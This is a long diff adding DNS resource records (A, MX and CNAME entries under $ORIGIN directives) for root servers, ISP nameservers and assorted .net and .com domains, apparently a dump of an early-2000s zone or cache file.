+DNS1 IN A 207.46.232.37 +$ORIGIN HHS.net. +NS IN A 63.93.136.29 +$ORIGIN NEWACCOUNT.net. +NS IN A 216.121.96.26 +$ORIGIN PBI.net. +NS2 IN A 206.13.29.11 +NS1 IN A 206.13.28.11 +$ORIGIN timeheart.net. +ns1 IN A 63.197.231.203 +$ORIGIN TOSA.TWTELECOM.net. +INS2 IN A 204.95.160.4 +INS1 IN A 204.95.160.2 +$ORIGIN zama.net. +NS2 IN A 203.142.130.5 +NS1 IN A 203.142.130.4 +$ORIGIN MINDLINK.net. +GIANT IN A 204.174.18.2 +DEEP IN A 204.174.16.4 +$ORIGIN SER.BBNPLANET.net. +KNOCK IN A 192.239.16.129 +$ORIGIN MEDIASERVICES.net. +NS2 IN A 64.65.16.237 +NS IN A 64.65.15.147 +$ORIGIN KOLO.net. +NS IN A 209.66.103.20 +$ORIGIN SEYCHELLES.net. +NS1 IN A 202.84.235.33 +$ORIGIN BT.net. +NS0 IN A 194.72.6.51 +$ORIGIN JERKY.net. +NS1 IN A 204.57.55.100 +$ORIGIN CN.net. +DNS2 IN A 202.97.18.61 +NS1 IN A 202.97.7.17 +NS IN A 202.97.16.195 +$ORIGIN runway.CN.net. +ns IN A 211.101.132.8 +$ORIGIN APNIC.net. +SVC00 IN A 202.12.28.131 +TECKLA IN A 202.12.28.129 +NS IN A 203.37.255.97 +$ORIGIN BELLSOUTH.net. +NS IN A 205.152.0.5 +$ORIGIN ATL.BELLSOUTH.net. +NS IN A 205.152.0.20 +$ORIGIN CL.BELLSOUTH.net. +NS2 IN A 205.152.16.8 +NS3 IN A 205.152.32.8 +$ORIGIN MIA.BELLSOUTH.net. +NS IN A 205.152.16.20 +$ORIGIN RDU.BELLSOUTH.net. +NS IN A 205.152.32.20 +$ORIGIN 163.net. +SHNS IN A 61.129.65.108 +BJNS IN A 202.108.255.202 +NS IN A 202.108.255.201 +$ORIGIN ca.us.ibm.net. +ns02 IN A 165.87.201.243 +ns01 IN A 165.87.201.244 +$ORIGIN ny.us.ibm.net. +ns01 IN A 165.87.194.244 +$ORIGIN CP.net. +NS3 IN A 209.228.14.4 +NS1 IN A 209.228.15.4 +$ORIGIN tallship.net. +falcon IN A 208.179.112.2 +condor IN A 12.28.140.20 +nomad IN A 204.107.129.2 +satan IN A 204.107.129.3 +rectum IN A 204.107.129.10 +$ORIGIN ns.tmcs.net. +b IN A 209.104.33.252 +c IN A 209.104.39.252 +a IN A 209.104.63.252 +$ORIGIN pshift.net. +mail IN A 208.153.85.30 +$ORIGIN CTCCOM.net. +NS4 IN A 64.69.100.35 +NS3 IN A 64.69.100.67 +$ORIGIN cid.net. +bofh IN A 212.172.21.254 +$ORIGIN PIPEX.net. +NS0 IN A 158.43.128.8 +NS1 IN A 158.43.192.7 +$ORIGIN DNS.PIPEX.net. +NS1-Y IN A 158.43.193.89 +NS0-Y IN A 158.43.129.89 +$ORIGIN SOTELMA.net. +DOGON IN A 208.144.230.1 +CIWARA IN A 208.144.230.2 +$ORIGIN DK.net. +NS IN A 193.88.44.42 +$ORIGIN HIGGS.net. +ns2 IN A 204.80.125.145 +ns3 IN A 204.80.101.94 +ns IN A 204.80.101.90 +ns1 IN A 204.80.125.130 +PINE IN A 204.80.125.130 +$ORIGIN E-SYNC.net. +NS2 IN A 192.206.57.128 +NS1 IN A 192.206.57.127 +$ORIGIN ABOVE.net. +NS3 IN A 207.126.105.146 +NS IN A 207.126.96.162 +$ORIGIN COBEX.net. +NS2 IN A 207.102.129.72 +NS1 IN A 207.102.129.71 +$ORIGIN NEO.net. +NS2 IN A 206.109.7.65 +NS IN A 206.109.1.1 +$ORIGIN AFRIQ.net. +BAABEN IN A 165.231.1.3 +NEENE IN A 165.231.1.2 +$ORIGIN CW.net. +NS4 IN A 204.70.49.234 +NS2 IN A 204.70.57.242 +NS3 IN A 204.70.25.234 +NS IN A 204.70.128.1 +$ORIGIN hactrn.net. +NS IN A 216.254.68.12 +$ORIGIN QUASAR.net. +NS1 IN A 199.166.31.3 +$ORIGIN VERMONTLAW.net. +NS1 IN A 63.89.26.15 +NS IN A 63.89.26.16 +$ORIGIN ICP.net. +ICM1 IN A 192.94.207.66 +$ORIGIN wetlogic.net. +athome IN CNAME c1059495-a.snvl1.sfba.home.com. +$ORIGIN NY.ALTER.net. +New-York4 IN A 137.39.126.10 + IN A 137.39.2.3 +$ORIGIN pccf.net. +proxy IN A 205.189.73.123 +$ORIGIN IS-FUN.net. +NS4 IN A 212.162.54.34 +$ORIGIN GUA.net. +OSI2 IN A 205.161.188.3 +$ORIGIN 2GLOBE.net. +TERMINAL IN A 195.178.183.230 +NS IN A 195.178.183.200 +$ORIGIN SYS.GTEI.net. +DNSAUTH2 IN A 4.2.49.3 +DNSAUTH3 IN A 4.2.49.4 +DNSAUTH1 IN A 4.2.49.2 +$ORIGIN SPEAKEASY.net. +NS2 IN A 216.231.41.22 +NS1 IN A 216.254.0.9 +$ORIGIN PSI.net. +NS2 IN A 38.8.50.2 +$ORIGIN DNS.UK.PSI.net. +SEC1 IN A 154.32.105.34 +$ORIGIN ray.net. +ns1 IN A 195.238.228.131 +$ORIGIN anycast.net. +ns1 IN A 216.196.51.4 +$ORIGIN EP.net. +FLAG IN A 198.32.4.13 +$ORIGIN SR.net. +NS2 IN A 200.1.156.11 +NS1 IN A 200.1.157.10 +$ORIGIN IPTEK.net. +CADDSYS IN A 202.46.1.2 +$ORIGIN NIC.XLINK.net. +DNS IN A 193.141.40.42 +$ORIGIN NURSAT.net. +NS2 IN A 212.13.167.1 +NS IN A 194.226.128.1 +$ORIGIN 188.net. +smtp IN A 202.96.125.104 +mx2 IN A 202.96.125.101 +ns2 IN A 202.103.134.4 +mx1 IN A 202.96.125.100 +NS IN A 202.96.125.106 +$ORIGIN KORNET.net. +NS IN A 168.126.63.1 +$ORIGIN CCSRS.net. +NS2 IN A 206.253.214.73 +NS1 IN A 209.237.73.73 +$ORIGIN EU.net. +NS IN A 192.16.202.11 +$ORIGIN USSR.EU.net. +NS IN A 193.124.22.65 +$ORIGIN RELCOM.EU.net. +NS IN A 193.124.23.3 +$ORIGIN AUSTRIA.EU.net. +NS IN A 192.92.138.35 +NS3 IN A 193.154.160.110 +$ORIGIN hypa.net. +ns2 IN A 63.160.181.11 +ns1 IN A 63.160.181.10 + IN A 209.166.167.208 +$ORIGIN IDT.net. +NS IN A 198.4.75.100 +$ORIGIN NS.IDT.net. +AUTH2 IN A 169.132.133.1 +$ORIGIN ROOT-SERVERS.net. +A IN A 198.41.0.4 +B IN A 128.9.0.107 +C IN A 192.33.4.12 +D IN A 128.8.10.90 +E IN A 192.203.230.10 +F IN A 192.5.5.241 +G IN A 192.112.36.4 +H IN A 128.63.2.53 +I IN A 192.36.148.17 +$ORIGIN I-DNS.net. +D IN A 211.169.245.170 +B IN A 208.184.25.199 +F IN A 216.200.119.128 +E IN A 202.160.253.152 +C IN A 210.189.254.50 +A IN A 208.184.174.7 +$ORIGIN US.PRSERV.net. +NS4 IN A 165.87.201.244 +NS1 IN A 165.87.194.244 +NS3 IN A 165.87.201.243 +$ORIGIN U-NET.net. +NS0 IN A 194.119.128.65 +NS1 IN A 194.119.128.66 +$ORIGIN HS0.U-NET.net. +NS0 IN A 194.119.128.70 +NS1 IN A 194.119.128.71 +$ORIGIN ULTRADNS.net. +UDNS2 IN A 204.74.101.1 +UDNS1 IN A 204.69.234.1 +$ORIGIN WEBMAGIC.net. +NS2 IN A 64.168.49.66 +NS1 IN A 209.119.182.2 +$ORIGIN HOST4U.net. +NS2 IN A 209.150.129.3 +NS IN A 209.150.128.30 +$ORIGIN RCCN.net. +DNS IN A 193.136.7.17 +$ORIGIN valley.net. +lebanon IN A 198.115.160.16 +NS2 IN A 198.115.160.16 +DNS IN A 198.115.160.10 +$ORIGIN primary.net. +dns2 IN A 205.242.187.235 +NS2 IN A 205.242.176.103 +dns1 IN A 205.242.187.234 +NS1 IN A 205.242.92.2 +$ORIGIN SQUONK.net. +NS2 IN A 63.84.12.135 +NS1 IN A 63.84.12.133 +$ORIGIN IP-PLUS.net. +NS1 IN A 164.128.36.34 +$ORIGIN TECHNOLOGIA.net. +NS2 IN A 207.253.59.4 +NS1 IN A 207.253.214.199 +NS3 IN A 195.115.180.67 +$ORIGIN VI.net. +NS2 IN A 212.78.64.10 +NS1 IN A 194.88.77.1 +$ORIGIN ISLES.net. +RS IN A 212.100.224.90 +$ORIGIN SOVER.net. +time IN CNAME garnet.sover.net. +mqueue IN A 209.198.87.52 +etrn IN A 209.198.87.58 +garnet IN A 209.198.87.53 +MAPLE IN A 209.198.87.41 +CLOVER IN A 209.198.87.40 +mail IN A 209.198.87.53 + IN A 209.198.87.34 +mqueue0 IN A 209.198.87.52 +$ORIGIN ACT2000.net. +ACT2 IN A 207.42.132.227 +ACT1 IN A 207.42.132.226 +$ORIGIN AKADNS.net. +ZA IN A 209.185.188.39 +ZB IN A 216.32.65.105 +ZC IN A 204.178.107.227 +ZD IN A 204.178.110.67 +ZE IN A 216.200.14.118 +ZF IN A 208.5.85.132 +ZG IN A 206.132.160.36 +ZH IN A 63.208.48.42 +$ORIGIN NS.ESAT.net. +NS3 IN A 192.111.39.100 +$ORIGIN THEPLANET.net. +EARTH IN A 195.92.195.222 +PLUTO IN A 194.207.6.30 +VENUS IN A 194.152.65.222 +$ORIGIN UU.net. +uunet IN MX 10 Mail.uu.net. +external-mail-router IN A 198.5.241.39 + IN A 198.5.241.38 + IN A 198.5.241.40 +NS IN A 137.39.1.3 +$ORIGIN NS.DE.UU.net. +AUTH03 IN A 192.76.144.16 +$ORIGIN NS.UU.net. +AUTH100 IN A 198.6.1.202 +AUTH00 IN A 198.6.1.65 +AUTH02 IN A 198.6.1.82 +AUTH03 IN A 198.6.1.83 +AUTH60 IN A 198.6.1.181 +AUTH61 IN A 198.6.1.182 +AUTH110 IN A 198.6.1.114 +AUTH50 IN A 198.6.1.161 +AUTH51 IN A 198.6.1.162 +$ORIGIN PIONEERNET.net. +DNS2 IN A 208.240.196.10 +DNS1 IN A 208.240.196.9 +$ORIGIN HOME.net. +NS2 IN A 24.2.0.27 +NS1 IN A 24.0.0.27 +$ORIGIN QUANTIFIED.net. +NS2 IN A 63.212.171.3 +NS1 IN A 63.212.171.2 +$ORIGIN SECURE.net. +NS2 IN A 161.58.9.10 +NS1 IN A 192.41.1.10 +$ORIGIN DSL.net. +NS2 IN A 209.87.79.232 +NS1 IN A 209.87.64.70 +$ORIGIN JA.net. +NS0 IN A 128.86.1.20 + IN A 193.63.94.20 +$ORIGIN ULCC.JA.net. +NOC IN A 193.63.94.25 +$ORIGIN CINE.net. +NS2 IN A 207.168.250.12 +$ORIGIN ANS.net. +NS-02B IN A 207.24.245.178 +NS-01B IN A 199.221.47.8 +NS-02A IN A 207.24.245.179 +NS-01A IN A 199.221.47.7 +$ORIGIN OAR.net. +NS2 IN A 192.88.195.10 +NS1 IN A 192.88.193.144 +$ORIGIN MAHNET.net. +NS2 IN A 207.219.173.132 +NS1 IN A 24.69.168.121 +$ORIGIN NCREN.net. +REGGAE IN A 128.109.131.3 +NCNOC IN A 192.101.21.1 +$ORIGIN AMERICA.net. +AUTH2 IN A 209.17.197.18 +AUTH1 IN A 209.17.197.2 +$ORIGIN EXODUS.net. +NS2 IN A 207.82.198.150 +NS IN A 206.79.230.10 +NS3 IN A 206.79.240.13 +$ORIGIN NJ.EXODUS.net. +NS2 IN A 209.1.10.234 +NS IN A 206.79.7.50 +$ORIGIN DOUBLECLICK.net. +uunymdgds1 IN A 206.65.183.21 +dcnymdgds1 IN A 204.253.104.202 +exnjmdgds1 IN A 209.67.38.22 +dcnyadgds1 IN A 204.253.104.11 +bbvamdgds1 IN A 128.11.60.75 +exnjadgds1 IN A 209.67.38.48 +annyadgds1 IN A 208.184.29.250 +annyadgds2 IN A 208.184.29.252 +cwvamdgds1 IN A 205.138.3.240 +uucamdgds1 IN A 204.178.112.124 +cwvaadgds1 IN A 205.138.3.242 +spnjadgds1 IN A 208.32.211.70 +cwvaadgds2 IN A 205.138.3.243 +ctukadgds1 IN A 213.86.246.20 +tlseadgds1 IN A 194.237.107.6 +uusjmdgds1 IN A 204.176.177.20 +uuvamdgds1 IN A 204.178.112.168 +$ORIGIN DCNY.DOUBLECLICK.net. +NS2 IN A 204.253.104.10 +NS1 IN A 208.211.225.10 +$ORIGIN UUSJ.DOUBLECLICK.net. +NS1 IN A 204.176.177.10 +$ORIGIN CWVA.DOUBLECLICK.net. +NS1 IN A 205.138.3.20 +$ORIGIN DSO.net. +NS2 IN A 206.16.77.11 +NS1 IN A 206.16.77.10 +$ORIGIN GIP.net. +NS2 IN A 204.59.1.222 +NS1 IN A 204.59.144.222 +NS3 IN A 204.59.64.222 +$ORIGIN AMNIC.net. +NS IN A 195.250.64.90 +$ORIGIN TELSTRA.net. +NS1 IN A 139.130.4.5 +$ORIGIN ELI.net. +NS2 IN A 207.173.86.2 +NS IN A 209.63.0.2 +$ORIGIN TWNIC.net. +NS IN A 192.83.166.11 +$ORIGIN BAHNHOF.net. +NS2 IN A 212.85.64.4 +NS1 IN A 195.178.160.2 +$ORIGIN ivm.net. +ns1 IN A 62.204.1.1 +$ORIGIN BEACHSHORE.net. +NS1 IN A 199.166.31.250 +$ORIGIN TDS.net. +NS IN A 204.246.1.20 +$ORIGIN FIRSTWORLD.net. +NS4 IN A 216.7.160.162 +NS2 IN A 216.127.92.78 +NS1 IN A 216.7.160.75 +NS3 IN A 216.7.160.161 +$ORIGIN centralinfo.net. +ns2 IN A 63.102.204.130 +ns1 IN A 63.102.200.2 +$ORIGIN NOC.NULLUS.net. +NS2 IN A 63.119.253.254 +NS3 IN A 63.168.101.254 +NS1 IN A 209.136.161.254 +$ORIGIN FREE.net. +NS1 IN A 147.45.15.34 +$ORIGIN mediaone.net. +NS1 IN A 24.128.1.80 +NS2 IN A 24.128.1.81 +$ORIGIN MW.mediaone.net. +NS1 IN A 24.131.1.8 +$ORIGIN JVNC.net. +NISC IN A 128.121.50.7 +$ORIGIN NS.NYC1.GLOBIX.net. +Z1 IN A 209.10.66.55 +$ORIGIN NS.LHR1.GLOBIX.net. +Z1 IN A 212.111.32.38 +$ORIGIN NS.SJC1.GLOBIX.net. +Z1 IN A 209.10.34.55 +$ORIGIN akamaitech.net. +za IN A 204.178.107.226 +n6g IN A 216.52.121.175 +ZB IN A 128.11.47.240 +n2g IN A 216.52.56.47 +ZC IN A 216.32.65.14 +ZD IN A 38.144.120.147 +n5g IN A 216.52.56.33 +ZE IN A 216.200.14.134 +n1g IN A 216.52.56.36 +ZF IN A 204.178.110.73 +n8g IN A 216.52.56.33 +ZG IN A 209.185.188.14 +n4g IN A 216.52.56.33 +ZH IN A 213.161.66.165 +n0g IN A 216.52.56.33 +n7g IN A 216.52.196.5 +n3g IN A 216.52.56.48 +$ORIGIN THNIC.net. +NS-AIT IN A 192.41.170.219 +NS IN A 202.28.0.1 +$ORIGIN connriver.net. +mailer IN A 63.93.137.13 +ns2 IN A 208.240.246.5 +netserver IN A 204.249.74.100 +$ORIGIN IT.net. +DNS2 IN A 151.1.2.1 +DNS IN A 151.1.1.1 +$ORIGIN D4P.net. +foolusmf IN CNAME a100.g.akamai.net. +$ORIGIN LUCKY.net. +NS IN A 193.193.193.100 +$ORIGIN SENET.net. +NS IN A 206.155.163.195 +$ORIGIN RIPE.net. +NS IN A 193.0.0.193 +$ORIGIN ADELPHIA.net. +NS2 IN A 24.48.62.35 +NS3 IN A 208.239.78.134 +NS1 IN A 24.48.43.3 +$ORIGIN cdp.ADELPHIA.net. +mx1 IN A 24.48.58.221 +$ORIGIN buf.ADELPHIA.net. +mx1 IN A 24.48.36.10 +$ORIGIN INTERNIC.net. +NS2 IN A 198.41.0.11 +$ORIGIN UNDPBI.TELEPAC.net. +SOL IN A 194.65.87.2 +$ORIGIN KRNIC.net. +NS1 IN A 202.30.50.51 +NS IN A 202.30.50.50 +$ORIGIN UNI2.net. +NS2 IN A 195.82.195.99 +NS IN A 129.142.7.99 +$ORIGIN GTLD-SERVERS.net. +K IN A 213.177.194.5 +A IN A 198.41.3.38 +B IN A 203.181.106.5 +M IN A 202.153.114.101 +C IN A 205.188.185.18 +D IN A 208.206.240.5 +E IN A 207.200.81.69 +F IN A 198.17.208.67 +G IN A 198.41.3.101 +I IN A 192.36.144.133 +J IN A 210.132.100.101 +$ORIGIN dns.swip.net. +kista IN A 192.71.220.9 +$ORIGIN RCPIP.net. +EKEKO IN A 209.45.127.2 +$ORIGIN UNA.net. +ENGINE1 IN A 208.136.52.74 +$ORIGIN hcr.net. +ns IN A 208.240.246.4 +$ORIGIN NSIREGISTRY.net. +NS2 IN A 198.41.3.108 +$ORIGIN SUBTEND.net. +NAVI IN A 208.186.117.224 +NS1 IN A 208.186.117.71 +$ORIGIN IAD.GBLX.net. +NAME IN A 204.152.166.155 +$ORIGIN PHX.GBLX.net. +NAME IN A 206.165.6.10 +$ORIGIN ROC.GBLX.net. +NAME IN A 209.130.187.10 +$ORIGIN SHOREHAM.net. +pop IN CNAME shoreham.net. +$ORIGIN GREENMOUNTAINACCESS.net. +NS2 IN A 208.144.252.31 +NS1 IN A 208.144.252.30 +$ORIGIN MINDSPRING.net. +SCRATCHY IN A 207.69.200.211 +ITCHY IN A 207.69.200.210 +$ORIGIN RIPN.net. +NS2 IN A 195.209.0.6 +NS IN A 194.85.119.1 +$ORIGIN CWCI.net. +NS0 IN A 194.6.79.162 +$ORIGIN GBMTECH.net. +NS2 IN A 208.243.164.3 +NS1 IN A 208.243.164.2 +$ORIGIN vrx.net. +pedic-med IN A 199.166.24.2 +ns2 IN A 65.196.80.102 +ns3 IN A 199.166.24.3 +ns1 IN A 199.166.24.1 + IN A 216.13.76.2 +$ORIGIN globalnetisp.net. +NS2 IN A 207.136.213.2 +NS1 IN A 207.136.213.1 +$ORIGIN MYNET.net. +FAITH IN A 207.13.11.2 +$ORIGIN ADNS.net. +NS2 IN A 199.5.157.3 +KOVU IN A 199.5.157.52 +NS1 IN A 199.5.157.2 +$ORIGIN DIEBOLD.net. +NS1 IN A 65.196.80.10 +$ORIGIN JPS.net. +NS2 IN A 216.224.156.252 +NS1 IN A 216.119.0.192 +$ORIGIN NETNAMES.net. +NS2 IN A 212.53.77.28 +NS1 IN A 212.53.64.60 +$ORIGIN RIO.net. +ORSTOM IN A 192.33.151.1 +$ORIGIN com. +sherickpm IN MX 10 inbound.sherickpm.com.criticalpath.net. +ultradevices IN A 209.249.61.20 +verisign IN A 205.139.94.60 +vermontel IN A 204.164.106.2 + IN MX 0 pop.vermontel.net. +TOPICA IN A 206.132.75.196 +unknown IN A 168.143.148.168 +vietmercury IN A 207.1.134.34 +moonmothers IN A 24.218.253.157 + IN MX 10 costorf.ne.mediaone.net. +vhv IN MX 0 mail.vhv.com. +BURSTNET IN MX 15 mail.ar.com. + IN MX 5 ibd.ar.com. +velco IN A 207.217.96.41 + IN A 207.217.96.42 + IN A 207.217.96.43 + IN A 207.217.96.44 + IN A 207.217.96.45 + IN A 207.217.96.28 + IN A 207.217.96.29 + IN A 207.217.96.30 + IN A 207.217.96.31 + IN A 207.217.96.32 + IN A 207.217.96.33 + IN A 207.217.96.34 + IN A 207.217.96.35 + IN A 207.217.96.36 + IN A 207.217.96.37 + IN A 207.217.96.38 + IN A 207.217.96.39 + IN A 207.217.96.40 + IN MX 10 mail.velco.com. +ffic IN A 64.84.58.128 + IN MX 5 mail.mailconnect.com. +overstock IN A 64.78.130.251 +madriver IN MX 10 bend.madriver.com. +catic1 IN MX 10 Mail.catic1.com. + IN MX 20 smtp-Relay.CTCCom.net. +goldstats IN A 66.33.12.17 +nominum IN A 204.152.184.170 +hill IN A 208.162.106.6 + IN MX 20 mail.hill.com. +garmontusa IN MX 20 mail.garmontusa.com. +bt IN A 62.7.244.127 +xraylitho IN MX 10 mail.sover.net. + IN MX 20 mqueue.sover.net. +glaxowellcome IN MX 10 firewall1.glaxowellcome.com. + IN MX 10 firewall3.glaxowellcome.com. +nova-data IN A 64.70.144.14 + IN MX 10 mail.nova-data.com. +AVENUEA IN MX 100 mail2.louisdreyfus.co.uk. + IN MX 10 ldfwsvr2.l-dreyfus.com. + IN MX 50 ldfwsvr02-hme1.l-dreyfus.com. + IN MX 75 mail.louisdreyfus.co.uk. +best IN MX 10 mail1.best.com. + IN MX 10 mail2.best.com. + IN MX 20 mail3.best.com. + IN MX 20 mail4.best.com. +biketrack IN MX 20 mqueue.sover.net. + IN MX 10 mail.sover.net. +ilovedomain IN A 211.175.164.170 +symquest IN A 64.69.102.131 + IN MX 10 Quest-7.symquest.com. +QUEST-NET IN A 207.140.30.11 + IN MX 5 mail.quest-net.com. +cacheware IN A 209.128.82.20 +Algebra IN A 208.233.99.160 +gmcr IN A 12.34.108.130 + IN MX 10 gateway1.gmcr.com. +YAHOO IN A 216.115.108.243 + IN A 216.115.108.245 +ogud IN MX 90 smtp.elistx.com. + IN MX 10 mail.dc.ogud.com. +costorf IN A 24.218.253.157 + IN MX 10 costorf.ne.mediaone.net. +highmeadow IN A 207.136.209.6 + IN MX 10 hm6.vt.highmeadow.com. + IN MX 20 mqueue.sover.net. +broadsoft IN A 208.39.36.48 +cmates IN MX 10 popmail.u-net.com. +mt-mansfield IN A 208.153.85.16 + IN MX 10 mail.pshift.net. + IN MX 30 pomail.pshift.com. +skiinsurance IN MX 10 mail.skiinsurance.com. + IN MX 20 etrn.sover.net. +map IN A 206.98.40.150 +idx IN MX 30 isdev.idx.com. + IN MX 50 drawbridge.idx.com. + IN MX 10 idx.idx.com. + IN MX 20 bvtsweeper.idx.com. +msgbox IN A 216.71.82.42 +sleepycat IN A 192.41.61.122 +cisco IN A 198.133.219.25 + IN MX 10 proxy2.cisco.com. + IN MX 10 proxy3.cisco.com. + IN MX 20 proxy6.cisco.com. + IN MX 20 proxy9.cisco.com. + IN MX 10 proxy1.cisco.com. +TOAPLAN IN A 216.42.31.169 +hometownbands IN A 209.67.235.38 +smuggs IN MX 10 mail.smuggs.com. +clothncanvas IN A 208.153.85.16 + IN MX 10 mail.pshift.net. + IN MX 30 mail.pshift.com. +quantified IN A 63.212.171.4 +arabia IN A 216.251.232.40 +bostic IN A 199.103.241.218 +verisign-grs IN A 198.41.3.55 +gdarm IN MX 10 bvt-ext.gdarm.com. +retro IN A 205.179.181.194 + IN MX 10 gw.retro.com. + IN MX 20 www.retro.com. + IN MX 50 mail.scruznet.com. +vssg IN A 216.157.26.252 +jerusalem-mail IN A 216.251.232.93 + IN MX 10 mail.jerusalem-mail.com. +tfm IN MX 50 mtbaker.tfm.com. + IN MX 20 mailhost.tfm.com. +fratfunz IN A 216.226.16.150 +elektro IN A 192.188.133.3 +WonderWorks IN A 192.203.206.65 + IN MX 50 mail.wonderworks.com. +fiberia IN MX 10 webmail.fiberia.com. +tifosi IN MX 10 gutenberg.bucksnet.com. +ivillage IN A 209.185.162.150 +pwshift IN A 208.153.85.36 +goputney IN MX 10 mail.sover.net. + IN MX 20 mqueue.sover.net. +$ORIGIN IPNS.com. +NS2 IN A 63.230.183.1 +NS IN A 208.187.190.2 +$ORIGIN appliedtheory.com. +NS2 IN A 168.75.17.11 +NS1 IN A 204.168.28.9 +ns3 IN A 207.127.101.8 +$ORIGIN COMPUWARE.com. +nl IN MX 150 uucp.nl.net. + IN MX 50 bitbucket.extern.uniface.nl. + IN MX 100 smtp.nl.net. +$ORIGIN YOUR-DOMAIN.com. +NS2 IN A 216.167.31.177 +NS1 IN A 216.167.31.176 +$ORIGIN nortelnetworks.com. +NS-RCH IN A 192.135.215.2 +NS-OTT IN A 192.58.194.71 +ns-har IN A 192.100.101.3 +$ORIGIN SJMERCURY.com. +BAYONET IN A 207.1.134.34 +$ORIGIN excite.com. +NSE00 IN A 198.3.102.250 +NS00 IN A 198.3.98.250 +NSE01 IN A 198.3.102.251 +NS01 IN A 198.3.98.251 +$ORIGIN PLANET-THREE.com. +NS0 IN A 212.49.219.164 +$ORIGIN TOKYO.JP.NETDNS.com. +NS1 IN A 64.56.164.118 +$ORIGIN LONDON.UK.NETDNS.com. +NS1 IN A 212.62.6.38 +$ORIGIN SANFRANCISCO.US.NETDNS.com. +NS1 IN A 207.82.50.166 +$ORIGIN NEWYORK.US.NETDNS.com. +NS1 IN A 216.32.212.86 +$ORIGIN SEATTLE.US.NETDNS.com. +NS1 IN A 206.253.214.13 +$ORIGIN ARICATRA.com. +NS IN A 206.64.112.114 +$ORIGIN REGME.com. +NS1 IN A 207.153.57.14 +$ORIGIN ELISTX.com. +smtp IN A 209.116.252.130 +NS IN A 209.116.252.130 +$ORIGIN SIGMAHOSTING.com. +NS1 IN A 209.241.86.6 +$ORIGIN champcable.com. +CCC IN A 207.41.53.11 +$ORIGIN IAFRICA.com. +NS1 IN A 196.7.0.139 +NS3 IN A 196.7.0.137 +$ORIGIN dot-god.com. +A-GTLD-SERVERS IN A 205.189.73.123 +B-GTLD-SERVERS IN A 205.189.71.10 +$ORIGIN CONRADPROMOTIONS.com. +NS2 IN A 208.24.118.203 +NS1 IN A 208.158.96.118 +$ORIGIN onemain.com. +ns4 IN A 63.208.210.11 +NS2 IN A 166.90.148.68 +NS1 IN A 166.90.148.67 +ns3 IN A 63.208.210.10 +$ORIGIN SIMORGH.com. +NS1 IN A 209.1.163.10 +$ORIGIN Christ.com. +Yeshua IN A 207.54.4.5 +Abba IN A 63.229.15.59 +$ORIGIN TRAVELPHOTOCONTESTS.com. +www IN A 64.85.86.156 +$ORIGIN WEB2010.com. +NS4 IN A 216.157.55.6 +NS2 IN A 216.157.79.246 +NS3 IN A 216.157.47.6 +NS IN A 209.235.31.149 +$ORIGIN 2DAY.com. +NS2 IN A 202.89.128.74 +NS1 IN A 202.37.240.13 +NS3 IN A 209.240.128.25 +$ORIGIN NETSCAPE.com. +tdns-me1 IN A 205.188.247.67 +tdns-me2 IN A 205.188.247.68 +tdns2 IN A 207.200.77.53 +tdns3 IN A 207.200.73.72 +NS IN A 198.95.251.10 +NS2 IN A 207.200.73.80 +$ORIGIN WWEBSVS.com. +PAPPILLOMA IN A 209.233.37.10 +$ORIGIN vermontel.com. +ns1 IN A 204.164.106.2 +$ORIGIN LA.TIS.com. +RELAY IN A 198.51.22.11 +$ORIGIN MSEN.com. +DNS IN A 148.59.19.11 +$ORIGIN bungi.com. +DAVER IN A 206.14.228.2 + IN A 207.126.97.2 +max IN A 206.14.228.7 + IN A 207.126.97.7 +$ORIGIN SPEEDHOST.com. +NS2 IN A 216.42.31.169 +NS3 IN A 216.42.31.130 +$ORIGIN GPG.com. +NS2 IN A 209.1.163.50 +NS1 IN A 209.1.163.30 +$ORIGIN NL.CONCENTRIC.com. +NS1 IN A 195.18.114.5 +$ORIGIN SJC.LYCOS.com. +SJC-NS2 IN A 206.79.171.40 +SJC-NS1 IN A 206.79.171.39 +$ORIGIN BOS.LYCOS.com. +BOS-NS2 IN A 209.67.228.40 +BOS-NS1 IN A 209.67.228.39 +$ORIGIN TOPICA.com. +NS3 IN A 206.111.131.72 +ns-ext IN A 206.132.75.195 +inmta011 IN A 206.132.75.197 +inmta009 IN A 206.132.75.226 +dns IN A 206.111.131.72 +outmta004 IN A 206.132.75.201 +inmta001 IN A 206.132.75.197 + IN A 206.111.131.79 +inmta003 IN A 206.132.75.213 +outmta010 IN A 206.132.75.222 +inmta005 IN A 206.132.75.217 +NS1 IN A 206.132.75.195 +NS2 IN A 208.184.76.200 +$ORIGIN DOLEH.com. +NS IN A 204.255.25.63 +$ORIGIN BSDI.com. +NS IN A 207.174.116.8 +$ORIGIN NYTIMES.com. +GATEKEEPER IN A 199.181.175.201 +$ORIGIN GDGSC.com. +NS0 IN A 192.160.62.66 +NS2 IN A 204.162.124.66 +$ORIGIN EDIGITALS.com. +NS2 IN A 211.39.139.36 +NS3 IN A 211.175.164.170 +NS1 IN A 211.39.139.35 +$ORIGIN INTERNETSQUARE.com. +NS2 IN A 205.227.232.9 +NS1 IN A 216.226.16.146 +$ORIGIN MAIL.com. +NS2 IN A 165.251.1.3 +GTLD IN A 165.251.1.239 +NS1 IN A 165.251.1.2 +$ORIGIN moonmothers.com. +localhost IN A 127.0.0.1 +www IN CNAME moonmothers.com. +$ORIGIN vhv.com. +mail IN A 208.5.161.11 +$ORIGIN BOCA15-VERIO.com. +NS15B IN A 208.55.91.51 +NS15A IN A 208.55.91.50 +$ORIGIN ar.com. +ns2 IN A 64.124.80.42 +ibd IN A 63.194.205.75 +mail IN A 63.194.205.74 +NS1 IN A 63.194.205.74 +$ORIGIN BLIPP.com. +VIC20 IN A 195.163.165.35 +$ORIGIN CONCOURSE.com. +NS IN A 199.218.113.2 +$ORIGIN velco.com. +mail IN A 198.136.217.106 +$ORIGIN FLONETWORK.com. +UUNS1DNS1 IN A 209.167.79.5 +UUNS1DNS2 IN A 209.167.79.6 +$ORIGIN overstock.com. +NS1 IN A 207.225.194.13 +$ORIGIN NEWACCOUNT.com. +NS4 IN A 209.78.16.6 +NS2 IN A 209.78.16.5 +NS3 IN A 216.121.32.205 +NS IN A 216.121.32.10 +$ORIGIN tridog.com. +NS2 IN A 206.168.112.51 +TRIDOG1 IN A 206.168.112.71 +$ORIGIN madriver.com. +bend IN A 207.136.232.15 +FUSION IN A 207.136.232.11 +PRIMUS IN A 207.136.232.12 +$ORIGIN catic1.com. +Mail IN A 207.190.204.103 +$ORIGIN IBD.com. +NIC IN A 209.249.61.18 +$ORIGIN IOM.com. +PEBBLES IN A 194.72.124.1 +$ORIGIN nominum.com. +shell IN A 204.152.187.59 +GNS2 IN A 198.133.199.2 +gns1 IN A 198.133.199.1 +$ORIGIN ATLONLINE.com. +ATLNET IN A 207.153.72.193 